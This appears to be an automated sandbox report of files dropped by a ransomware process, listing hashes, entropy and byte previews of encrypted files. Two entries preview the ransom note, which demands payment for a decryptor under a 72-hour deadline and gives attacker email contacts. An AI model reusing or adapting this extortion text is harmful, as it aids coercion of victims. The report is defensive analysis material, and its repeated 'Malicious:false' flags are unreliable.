                                                                                                                                            Preview:..6@..}..........l&.o.q/\9..(Ur.^.8........Z|..ncR..............a.n~`G.,.).yk.n^.X..z....h.p.j.P....Be..5...,.....2...W.VA..y..u.....&....3..r......=..\.@|-.hj..A......9.......>UT..e7......7=..R..jG.rL.j...U..eb...Yj...P.3l_..=........s.._o...../$.....0.GX..FM.~V1U..R.U..wi...P*2.o..`.k5......T....WEI....y.[.U.B7zo.uH.<]C....[...#^...3.;....I.....9x..z..G]%.z...#.E.:X...yKy.f.N...>....a........#.._...S..Do0......dc....Q.<.....z.....T...nC..&P...L>..w...p]?C.h....6..,.bL9...e..<....dj.?.;..mUc...3.K.|...\Yh.k..1.....2...)^=.F..Xx]]..:.g..3.|[*&.#gC...<...&......Q.q...c.0.......l.B....qrt.L.u.|:n.y..y.d_km..?..H...F|.....9N..I....:..A....inuoh=..o.H.'.D.N....!8...K.Lk..z.=..)..F.......\......Z....i....H.%..5.O..`..k..6....H/[..a.......Nd...."...B...TW....u4...............t.l|..]Q.>.rs_.C.s,.,H.[<...~0...0*....;e....e.SY.yT7R.ek m.......3.9....."....*LP.%...y.1hZ..@#...T7D.|bGI.~.$.........Z.6B.......c<e.(~a.........Isw...v..#.1[A..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.850601525013889
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ooodzxlj3CCLMUBTRu7XGVsEeRbcklk5SYxQ24ywn0ZFG9dGlmpDk:eX3DwU1RsGVsEqk52vnmITGkDk
                                                                                                                                            MD5:A3E7824F75E506414135693F8C81B4B2
                                                                                                                                            SHA1:8617BE65028E21CFBF45C9715CAA347DEE57C3A2
                                                                                                                                            SHA-256:4190122EBCA0BEEC3C05D7BB80023F42A5B7E20E5FCA6874E2F1E05550C324F0
                                                                                                                                            SHA-512:A45ADA491AE4706B707C2409713DF0D6173A80471F07E2282DE70BA4C44A1ECF8674C52B14C79A928A3FC382EDD1B55E4D6BAB3FEC34F6472F1471936845D677
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..w.J..AW.....=..Z.."$.5.oC.a......'.../..mE&...A .I..ln......]0.a....6];-.'....1.....u....E..C)..)..F#e..!'...4..{i..T..U;..(o.......B.=~Dn.".&:.%..^.....'..._.Z:.[o..H$.J..(...g....]....z.$....AS....K.V.YXE(.N...V.[.P.)....M.P...Qu!59...?..v.B].n.q-..3=....N......?...Kp.._#..].G..bVZm.........:......'.6.g:p.a..L...?...+r[a..\E!K.HA...... ..7.<...k...luo....^.Uk)/D.>.\..|......`..1.hjV.c.8GZ.i.,z..@S>d..P...m..D.;..I1/..K%-.aV~.V.d.X..,..dLpsl.R1.@.[..3fwo......$<*..l..Ytr.......#..v..5..t..YUh..;\ ..Ru..2uY.`.T.."?).T?..OpDU.'..rKl.K..bO....o.......=..BA.Y.H..c..6..e...\.J..X.l...x(..h).*.P-.M.o.X....|.`D..e2C/..........D/.GW....?7.N^~~.).V...g...FD.p..;Q.v(.......|Z......0+(..B....I6.SR.5.(R.....%..s.a8..HK.h..h.p..s.....y...I.@.......|.~...!..G.....kMs.u....|lx/L..,EzDm("..+..N.ve.O.?}0h....d.o.g.......d.K{.....uA.)H(..!..$9.../Tm#.s.4.L.\u0P.........HT....Z..<..[!.h.g...2..;v.(......n....<..bk...ee`.Cvdv...m.....3.)......M.P....O..N.......S
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.850601525013889
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ooodzxlj3CCLMUBTRu7XGVsEeRbcklk5SYxQ24ywn0ZFG9dGlmpDk:eX3DwU1RsGVsEqk52vnmITGkDk
                                                                                                                                            MD5:A3E7824F75E506414135693F8C81B4B2
                                                                                                                                            SHA1:8617BE65028E21CFBF45C9715CAA347DEE57C3A2
                                                                                                                                            SHA-256:4190122EBCA0BEEC3C05D7BB80023F42A5B7E20E5FCA6874E2F1E05550C324F0
                                                                                                                                            SHA-512:A45ADA491AE4706B707C2409713DF0D6173A80471F07E2282DE70BA4C44A1ECF8674C52B14C79A928A3FC382EDD1B55E4D6BAB3FEC34F6472F1471936845D677
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..w.J..AW.....=..Z.."$.5.oC.a......'.../..mE&...A .I..ln......]0.a....6];-.'....1.....u....E..C)..)..F#e..!'...4..{i..T..U;..(o.......B.=~Dn.".&:.%..^.....'..._.Z:.[o..H$.J..(...g....]....z.$....AS....K.V.YXE(.N...V.[.P.)....M.P...Qu!59...?..v.B].n.q-..3=....N......?...Kp.._#..].G..bVZm.........:......'.6.g:p.a..L...?...+r[a..\E!K.HA...... ..7.<...k...luo....^.Uk)/D.>.\..|......`..1.hjV.c.8GZ.i.,z..@S>d..P...m..D.;..I1/..K%-.aV~.V.d.X..,..dLpsl.R1.@.[..3fwo......$<*..l..Ytr.......#..v..5..t..YUh..;\ ..Ru..2uY.`.T.."?).T?..OpDU.'..rKl.K..bO....o.......=..BA.Y.H..c..6..e...\.J..X.l...x(..h).*.P-.M.o.X....|.`D..e2C/..........D/.GW....?7.N^~~.).V...g...FD.p..;Q.v(.......|Z......0+(..B....I6.SR.5.(R.....%..s.a8..HK.h..h.p..s.....y...I.@.......|.~...!..G.....kMs.u....|lx/L..,EzDm("..+..N.ve.O.?}0h....d.o.g.......d.K{.....uA.)H(..!..$9.../Tm#.s.4.L.\u0P.........HT....Z..<..[!.h.g...2..;v.(......n....<..bk...ee`.Cvdv...m.....3.)......M.P....O..N.......S
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.823935163884224
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Fs98uwQSeN7D5wiIvJrX1DX6QiqwUyaGBW0CN9q9KSQA3Hm7cSejUCL2:e9TH5wiIlVniFBoW9hhSe4CS
                                                                                                                                            MD5:26B371CA2F325E048AB00CA588532FED
                                                                                                                                            SHA1:7249FEFE32F14B1B39618ED96DC7F8961D4789C7
                                                                                                                                            SHA-256:8F6D350EABB830BE8D46237348DBAF890AD5A3B8E9F40FDFA4D10F649C34DF24
                                                                                                                                            SHA-512:3A0FAB92DA7A5157D4F92225D287B995D34B7A8B14C037F3B68883862341998600BB5C1EFB69EB3867D209FEDFB4DEB14009C851F5FED1BEC68A7573FEA4BCA1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:e.. 3vj.Z....j.^iM...9:..;....8&...b..M..]...?dP.....I@.I-....^$e..1....O.=..-D....!h.\9b0..G..4(>fl`..:.A.?.Q.!@....W.."..a.If..~...t]'m..h.;...Q..|....Jv....5...).g..F..,.....X._<8..5..2v.e@d^...L..S."....YX>.j.Lp....|+[....X._K.cm..P.......I...".9.....W.........b.IA..B.E..h.4.0.w...A......Z[ha.*._..T.. ...eZ3.2p.x.".+*U.r..>."x..|.i.x.e.....1....N...^.....b.uM@...y....$D.YT.*..[.8.#9w...>.G.s.F..ha.....o....r.i....B..D..b..m$.l.DY......F..\A.5rD..{..EQ..R=0bV...G+....F..h.|.BAr...}.Z...]A"_..:yJ....%a.A..9..v.,[..28....r9..;L'.&JN....<..rn.v..$.Q~M.0z.n./.M....i-..."bH....^!...J7.........YM.!$.Lu.fm.X$&..3.c...f....2....+0..k..9j.t...,...R5...%.D#<.._...R.@.I.c.m7~..]JX.....7.H.. ...&i...z......D....s....q..R..."..9P..OU.4^.D.&......9..]...qWT=L?...Z.<...l..<.E......0..H.B.$%.1.n.xPH..^.&.q....P!B.......@.O;.>]O.Fg.D.A.K..y.P......t...t$..GC.?..DCY_.z.R...X1..M.(!.....X..xUK_h..s")......3R.%.=...$.a.............}WK(.....tA......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.823935163884224
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Fs98uwQSeN7D5wiIvJrX1DX6QiqwUyaGBW0CN9q9KSQA3Hm7cSejUCL2:e9TH5wiIlVniFBoW9hhSe4CS
                                                                                                                                            MD5:26B371CA2F325E048AB00CA588532FED
                                                                                                                                            SHA1:7249FEFE32F14B1B39618ED96DC7F8961D4789C7
                                                                                                                                            SHA-256:8F6D350EABB830BE8D46237348DBAF890AD5A3B8E9F40FDFA4D10F649C34DF24
                                                                                                                                            SHA-512:3A0FAB92DA7A5157D4F92225D287B995D34B7A8B14C037F3B68883862341998600BB5C1EFB69EB3867D209FEDFB4DEB14009C851F5FED1BEC68A7573FEA4BCA1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:e.. 3vj.Z....j.^iM...9:..;....8&...b..M..]...?dP.....I@.I-....^$e..1....O.=..-D....!h.\9b0..G..4(>fl`..:.A.?.Q.!@....W.."..a.If..~...t]'m..h.;...Q..|....Jv....5...).g..F..,.....X._<8..5..2v.e@d^...L..S."....YX>.j.Lp....|+[....X._K.cm..P.......I...".9.....W.........b.IA..B.E..h.4.0.w...A......Z[ha.*._..T.. ...eZ3.2p.x.".+*U.r..>."x..|.i.x.e.....1....N...^.....b.uM@...y....$D.YT.*..[.8.#9w...>.G.s.F..ha.....o....r.i....B..D..b..m$.l.DY......F..\A.5rD..{..EQ..R=0bV...G+....F..h.|.BAr...}.Z...]A"_..:yJ....%a.A..9..v.,[..28....r9..;L'.&JN....<..rn.v..$.Q~M.0z.n./.M....i-..."bH....^!...J7.........YM.!$.Lu.fm.X$&..3.c...f....2....+0..k..9j.t...,...R5...%.D#<.._...R.@.I.c.m7~..]JX.....7.H.. ...&i...z......D....s....q..R..."..9P..OU.4^.D.&......9..]...qWT=L?...Z.<...l..<.E......0..H.B.$%.1.n.xPH..^.&.q....P!B.......@.O;.>]O.Fg.D.A.K..y.P......t...t$..GC.?..DCY_.z.R...X1..M.(!.....X..xUK_h..s")......3R.%.=...$.a.............}WK(.....tA......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.835094645226504
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:tkegxAJmcxfEpYXujw9rql7yMYo3LdVUP1czXDilA/MBA7mKg2hzUNubuIFm:DJmcReYXwO3Mh3ZFTiG/7c2hzUNub7Y
                                                                                                                                            MD5:F2F2EBACFDCC683E5E0BBADFDDF5709C
                                                                                                                                            SHA1:7066F62CB53F29107EB1E48F79976879DEBA95F4
                                                                                                                                            SHA-256:F52DF942173FDD4D319753BD4F754599D8FA954CB6DAA0189F6FA111E4E7C132
                                                                                                                                            SHA-512:B20AF5FB05AD4215CDEECCE1AEE8CC8EAA0C113495D6E7EC350E65B5F770101A39DBFDCD2AF12365730C7021A5D80566F55C71CA7BCFF933AF0E5EF553278E16
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.?3......O.+Q.8..;....,.[z....K..L.K.Vh.....a.....#.f.........C.<x.].*..v.....!....7.`R..9.&'.SYa...g..u..0..(...fM....3...`U....G.zyi.G..`d..K...sD4..B...Q.@\.G.i.._.....}.~...^(..:....hQ{.... .[A+.hN%...|...c.E.....g#).6 ..zo....k......wD`tO.....xv..2<.U...[a\......._%=..+....D.~>.%QD.W.....-U[..DB...s;{;.2.J...^]....$....wY....=.=......&.!.!!..]t.xY.w...k.Y..0....(.".........?.!8.D.....$7 l?IS.1.Q....".'..@....i..W4...?S........j...k..Q..!...L7.X>@...5./ZGM...[./:..}.B....]\.K...e.....!w.g.l.....l3..?.%......|..Z3R.+A.Qb.:....Ol...g.@...8..s........`.z..O.I.Fz...>.....P.K.u......b..........X......L.y_..V6..}..f.Sj....h.[.....432T2t..j1.{r.}z..Ay?..~tc.C...-.b...(.v.^..~....t.C...L:..'.f.............^ oWf.....h.ZC..0...:?._..O.}.)R..2..k....ow.-......e..(..}ZO.8... b...-4..9s@b.*....!.<..m.nA..M.N..7...m..!....M.;...l.V......r...91z.\...m..D.....5G.=zN..D..B.....$N..Z...(\........+.....k.-}b...<.....oP.2.o...5AV{s.(I*..\.D;...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.835094645226504
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:tkegxAJmcxfEpYXujw9rql7yMYo3LdVUP1czXDilA/MBA7mKg2hzUNubuIFm:DJmcReYXwO3Mh3ZFTiG/7c2hzUNub7Y
                                                                                                                                            MD5:F2F2EBACFDCC683E5E0BBADFDDF5709C
                                                                                                                                            SHA1:7066F62CB53F29107EB1E48F79976879DEBA95F4
                                                                                                                                            SHA-256:F52DF942173FDD4D319753BD4F754599D8FA954CB6DAA0189F6FA111E4E7C132
                                                                                                                                            SHA-512:B20AF5FB05AD4215CDEECCE1AEE8CC8EAA0C113495D6E7EC350E65B5F770101A39DBFDCD2AF12365730C7021A5D80566F55C71CA7BCFF933AF0E5EF553278E16
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.?3......O.+Q.8..;....,.[z....K..L.K.Vh.....a.....#.f.........C.<x.].*..v.....!....7.`R..9.&'.SYa...g..u..0..(...fM....3...`U....G.zyi.G..`d..K...sD4..B...Q.@\.G.i.._.....}.~...^(..:....hQ{.... .[A+.hN%...|...c.E.....g#).6 ..zo....k......wD`tO.....xv..2<.U...[a\......._%=..+....D.~>.%QD.W.....-U[..DB...s;{;.2.J...^]....$....wY....=.=......&.!.!!..]t.xY.w...k.Y..0....(.".........?.!8.D.....$7 l?IS.1.Q....".'..@....i..W4...?S........j...k..Q..!...L7.X>@...5./ZGM...[./:..}.B....]\.K...e.....!w.g.l.....l3..?.%......|..Z3R.+A.Qb.:....Ol...g.@...8..s........`.z..O.I.Fz...>.....P.K.u......b..........X......L.y_..V6..}..f.Sj....h.[.....432T2t..j1.{r.}z..Ay?..~tc.C...-.b...(.v.^..~....t.C...L:..'.f.............^ oWf.....h.ZC..0...:?._..O.}.)R..2..k....ow.-......e..(..}ZO.8... b...-4..9s@b.*....!.<..m.nA..M.N..7...m..!....M.;...l.V......r...91z.\...m..D.....5G.=zN..D..B.....$N..Z...(\........+.....k.-}b...<.....oP.2.o...5AV{s.(I*..\.D;...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.8669355936254775
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:gBv7p2HtTU9pv9T85XKapafpYo4suQTQDEd192GKy9GaJQ:gh7QN49wEapaaA39tGaJQ
                                                                                                                                            MD5:FE9EC2B9740068BF9A1EEA050C2B2EC5
                                                                                                                                            SHA1:F2E6B32A23DE5502DAE018AD879BA2648680F96F
                                                                                                                                            SHA-256:AAC86901CDCCBCA78F462CB63A026F1FDC518208077BB2D0B55AD9E0191B3880
                                                                                                                                            SHA-512:1D57DDFCF46ADB8D5F4764DBB6A361B5ADBF8B70BADFCDC090D6856895D48232C2095EF40563A3948473154331B4564D2CC3C9FE5AD4CE4DD2958B3328D2F843
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..]..X..f..$O+..........=0/c..N..d...........q]..9..=!..+F.TB2.t.N.7.S..!...W....E.u*..yj...p..*.......*.Z#:Po(b..h..>...,....H.[..).;..rNo....z..~...~.bB .......e...9..8|.....>.a.R..(vV...7L.....E~.G......(J.......6..4.6....R.......k.\u..yN..*{...IT..y.O}T..vdp..)..^.&I... .%..E..F........T...wH..D......0.......v/......c..*.O..B..1..=.7*.*.:ok[M..9ov/<\.j{.......4.:_;....B.tl..v.`...PX....C......-#...w9.;.MW(X#G.5...8.8.V.e..W..p|cF+...z..0.}..'f4.....?u.....>q......?.Ok.,..t7....XV.k..;Z.}.#.9)#........5..].%...w..0R$.O..!eD....+Yuq...@......K.G@. c..GgjL.._X*..f.Z.......&..e..J.d.%. .Q..(.....Y.W.Q... ...2.N'e......,2.j.`. .qf.......s...z.W..T.|......BuQ...!...c>....B{.w.V....X....:.=...,..&4g.....oHP..v]..PCDa.._...f.{..qz=V...+7....'.*.z..4...8.Y..Q....~....%.DtIi...8.].<...c#....].....c..I.?q-.x..&-..3.....w.<..t...[..lS..}X..?.."...c(2......f.y.i...!yw;A.~.W.8.4.....!...zC.S..9.'.G.u...^...&&=Xc.$.7d...h6...HM..};Y+/..<&.B.....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.8669355936254775
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:gBv7p2HtTU9pv9T85XKapafpYo4suQTQDEd192GKy9GaJQ:gh7QN49wEapaaA39tGaJQ
                                                                                                                                            MD5:FE9EC2B9740068BF9A1EEA050C2B2EC5
                                                                                                                                            SHA1:F2E6B32A23DE5502DAE018AD879BA2648680F96F
                                                                                                                                            SHA-256:AAC86901CDCCBCA78F462CB63A026F1FDC518208077BB2D0B55AD9E0191B3880
                                                                                                                                            SHA-512:1D57DDFCF46ADB8D5F4764DBB6A361B5ADBF8B70BADFCDC090D6856895D48232C2095EF40563A3948473154331B4564D2CC3C9FE5AD4CE4DD2958B3328D2F843
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..]..X..f..$O+..........=0/c..N..d...........q]..9..=!..+F.TB2.t.N.7.S..!...W....E.u*..yj...p..*.......*.Z#:Po(b..h..>...,....H.[..).;..rNo....z..~...~.bB .......e...9..8|.....>.a.R..(vV...7L.....E~.G......(J.......6..4.6....R.......k.\u..yN..*{...IT..y.O}T..vdp..)..^.&I... .%..E..F........T...wH..D......0.......v/......c..*.O..B..1..=.7*.*.:ok[M..9ov/<\.j{.......4.:_;....B.tl..v.`...PX....C......-#...w9.;.MW(X#G.5...8.8.V.e..W..p|cF+...z..0.}..'f4.....?u.....>q......?.Ok.,..t7....XV.k..;Z.}.#.9)#........5..].%...w..0R$.O..!eD....+Yuq...@......K.G@. c..GgjL.._X*..f.Z.......&..e..J.d.%. .Q..(.....Y.W.Q... ...2.N'e......,2.j.`. .qf.......s...z.W..T.|......BuQ...!...c>....B{.w.V....X....:.=...,..&4g.....oHP..v]..PCDa.._...f.{..qz=V...+7....'.*.z..4...8.Y..Q....~....%.DtIi...8.].<...c#....].....c..I.?q-.x..&-..3.....w.<..t...[..lS..}X..?.."...c(2......f.y.i...!yw;A.~.W.8.4.....!...zC.S..9.'.G.u...^...&&=Xc.$.7d...h6...HM..};Y+/..<&.B.....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.858873387100902
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:QXSgA+wyAcfqyH9wvE2cquF9QdqEm4FfvtxWGSgMsXcWXstLTvnAYXaWR7:QXSx+jDCMavE2cqw9Qdhm4ri/HLXaWt
                                                                                                                                            MD5:31FBCF90B923205570AB342A39F9279B
                                                                                                                                            SHA1:3F8E65D81444A27694950CDA311C3AAAAB8C7CCA
                                                                                                                                            SHA-256:62366FDC45CA747880CE7A571B35F7EEC4D30CB3B5442275415229F90B4430C8
                                                                                                                                            SHA-512:B1A98F34B906FB4284D422AEF87EACFA1598E789D6D1EEAC35EACFCD5A6B41EBA24A106A3AF92D3BBE696244816571701A48257BB1053B7BA291F54C16FF4F0E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..z..I6Sh6/.G....zS...,..i.Q.K<N[I...hVc..D*..."..X........>%..L...%E...;H".........M..O.....bp8..pR.oF..@.].........M..kG....8E`=..........h.....t..G......w.b<........^'I..B.h>.u..!.S..T...8Rw.rL....6.>p.];+%......q...VO.....+..Q.>..!nX.6V.AZ..../..yn.Ou.B.......>;.^V.`9..f......B..M....3....!.k.....b.."Z.ax.<...(.T#BW..........=).>.4p."....mR..~.n@x.*.....z..$2]..;...."..s........8.5...)qBj..!v~....R....SiC...d....<.Uu\.giaX.=...'G&...ko..0Mb.ym.....TG.d}h`b....9.>D'....|d.K`.....O.|.....m......(zP.....g8M.l..)..O....P..X..d..k.S..4..h\.g....D........;....]Q9.B.:.-..|J...Q.n.U...n....K.n..~...C..-.ke.....^.}.9WK/.....!.......D.[H....Yh*..]..L...v....E.%M..*...!.......+F....{..$.e:.z.!?'5nEzf>..R.a...C!...{Yb..<.1......e.9B....6....^A...F.e...E..Q....Y..mg...C...;..K...|..e.C._..h..5...)(.V..J....Rq.b@.j.....[..m.<.'...tH.#..r3wzl.#.\.w..p.~]..".u-.x....|......m.D.%.7}l0}..a.I.v2QK...o.........fM1[..4.?.7..!V.[qgk..G.`.G..G\....u.1U..#d@C.|
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.858873387100902
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:QXSgA+wyAcfqyH9wvE2cquF9QdqEm4FfvtxWGSgMsXcWXstLTvnAYXaWR7:QXSx+jDCMavE2cqw9Qdhm4ri/HLXaWt
                                                                                                                                            MD5:31FBCF90B923205570AB342A39F9279B
                                                                                                                                            SHA1:3F8E65D81444A27694950CDA311C3AAAAB8C7CCA
                                                                                                                                            SHA-256:62366FDC45CA747880CE7A571B35F7EEC4D30CB3B5442275415229F90B4430C8
                                                                                                                                            SHA-512:B1A98F34B906FB4284D422AEF87EACFA1598E789D6D1EEAC35EACFCD5A6B41EBA24A106A3AF92D3BBE696244816571701A48257BB1053B7BA291F54C16FF4F0E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..z..I6Sh6/.G....zS...,..i.Q.K<N[I...hVc..D*..."..X........>%..L...%E...;H".........M..O.....bp8..pR.oF..@.].........M..kG....8E`=..........h.....t..G......w.b<........^'I..B.h>.u..!.S..T...8Rw.rL....6.>p.];+%......q...VO.....+..Q.>..!nX.6V.AZ..../..yn.Ou.B.......>;.^V.`9..f......B..M....3....!.k.....b.."Z.ax.<...(.T#BW..........=).>.4p."....mR..~.n@x.*.....z..$2]..;...."..s........8.5...)qBj..!v~....R....SiC...d....<.Uu\.giaX.=...'G&...ko..0Mb.ym.....TG.d}h`b....9.>D'....|d.K`.....O.|.....m......(zP.....g8M.l..)..O....P..X..d..k.S..4..h\.g....D........;....]Q9.B.:.-..|J...Q.n.U...n....K.n..~...C..-.ke.....^.}.9WK/.....!.......D.[H....Yh*..]..L...v....E.%M..*...!.......+F....{..$.e:.z.!?'5nEzf>..R.a...C!...{Yb..<.1......e.9B....6....^A...F.e...E..Q....Y..mg...C...;..K...|..e.C._..h..5...)(.V..J....Rq.b@.j.....[..m.<.'...tH.#..r3wzl.#.\.w..p.~]..".u-.x....|......m.D.%.7}l0}..a.I.v2QK...o.........fM1[..4.?.7..!V.[qgk..G.`.G..G\....u.1U..#d@C.|
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.83415183495862
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:MOdG3qqTUZTkPut5VObUIwyDvDv/+dRn3f5Nd2KBjU0ONx8Ow:/ksTkPut5VKUu7adZ5NTUfNx8p
                                                                                                                                            MD5:855D247320399E061BE78B9B7DC04FF2
                                                                                                                                            SHA1:8105456C31E73691725405CAEA491C47572B2B34
                                                                                                                                            SHA-256:F599E1FF91D84C7068275075D29362920E3D3816C9EBE726026A2ADCFF2F7242
                                                                                                                                            SHA-512:CFCF1DB62D059F0207CC64E94CEEC95B31FD178626F10BADDD6F0E08623A8E1648B81C19E7FF7DA49FA85433FA155213D471CAF009039B305981718D94993C4E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.$....TZ..I.O..7......d..2..'./.....t~..C..6...A..`..(....9..G...Tsy...:g.UjgH...q.X....j..b.m.&!J .'. $."=.^..F...D0..Va....D...S......use..l.0........b...{b.x..Z.%QN9.gx...M..z.f.....W.f....5.KCnm...nP.y..u..`...S._.\^...5a.L`......y.%...zJ.N.1..)wh7...D...S.fy.......EYK..A2.......%.i...y........w.j.._<.0.Rm3.67."M.Q........hF.1P1 ....Q.<..8.h9...b..ip=5'..]..._.f...g..{?........(.:;N.c.y.`n.[l..TE. 8..xMA-]..XS..........2...DsHwI.d..m...!...C8.?...il7..VY..U.. 1.oP4......(j....H.K....^../1R..Z............#?.4EEV..Z....Nblb.H......ui.....8.q..@...J7...d.u....xh..h3.(..<?..SH....Q....*...M...H..b...L.........S;.!...j..=....*d.c.>|..<..6.s.....Q.T...S.Q6{..Z...P8ISQ.....|<md..;..Kq.qy....=.;..?..a?#..0..h...].*..B..Y..We4..$h.SO...cuC.{n%.k.@5k...>.."...j..6./Ni(Zs...b.t5H......)h.gbv.&.<.;...%<.....5./j.5...b...jR.X.'q1(......... .1#,.....:.T...C..#.N>.S."..Y.X&..k*d.....Brt.g.2..y..rEL..t...?...!z..,2q. .=.mq.....X.T.z.;].<%
